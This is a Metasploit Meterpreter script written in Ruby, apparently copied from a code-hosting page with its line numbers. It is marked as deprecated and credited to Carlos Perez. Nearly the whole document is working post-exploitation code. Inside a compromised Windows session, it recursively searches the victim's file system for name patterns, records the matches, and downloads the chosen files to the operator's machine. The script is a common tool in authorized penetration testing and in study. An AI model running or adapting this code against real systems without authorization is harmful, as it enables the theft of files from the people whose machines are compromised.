Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
#-------------------------------------------------------------------------------
10
@client = client
11
location = nil
12
search_blob = []
13
input_file = nil
14
output_file = nil
15
recurse = false
16
logs = nil
17
@opts = Rex::Parser::Arguments.new(
18
  "-h" => [false, "Help menu." ],
19
  "-i" => [true, "Input file with list of files to download, one per line."],
20
  "-d" => [true, "Directory to start search on, search will be recursive."],
21
  "-f" => [true, "Search blobs separated by a |."],
22
  "-o" => [true, "Output File to save the full path of files found."],
23
  "-r" => [false, "Search subdirectories."],
24
  "-l" => [true, "Location where to save the files."]
25
)
26
# Function for displaying help message
27
def usage
28
  print_line "Meterpreter Script for searching and downloading files that"
29
  print_line "match a specific pattern. First save files to a file, edit and"
30
  print_line("use that same file to download the chosen files.")
31
  print_line(@opts.usage)
32
  raise Rex::Script::Completed
33
end
34

35
# Check that we are running under the right type of Meterpreter
36
if client.platform == 'windows'
37
  # Parse the options
38
  if args.length > 0
39
    @opts.parse(args) { |opt, idx, val|
40
      case opt
41
      when "-h"
42
        usage
43
      when "-i"
44
        input_file = val
45
      when "-o"
46
        output_file = val
47
      when "-d"
48
        location = val
49
      when "-f"
50
        search_blob = val.split("|")
51
      when "-r"
52
        recurse = true
53
      when "-l"
54
        logs = val
55
      end
56
    }
57
    # Search for files and save their location if specified
58
    if search_blob.length > 0 and location
59
      search_blob.each do |s|
60
        print_status("Searching for #{s}")
61
        results = @client.fs.file.search(location,s,recurse)
62
        results.each do |file|
63
          print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
64
          file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
65
        end
66
      end
67
    end
68
    # Read log file and download those files found
69
    if input_file and logs
70
      if ::File.exist?(input_file)
71
        print_status("Reading file #{input_file}")
72
        print_status("Downloading to #{logs}")
73
        ::File.open(input_file, "r").each_line do |line|
74
          print_status("\tDownloading #{line.chomp}")
75
          @client.fs.file.download(logs, line.chomp)
76
        end
77
      else
78
        print_error("File #{input_file} does not exist!")
79
      end
80
    end
81
  else
82
    usage
83
  end
84
else
85
  print_error("This version of Meterpreter is not supported with this Script!")
86
  raise Rex::Script::Completed
87
end
88

89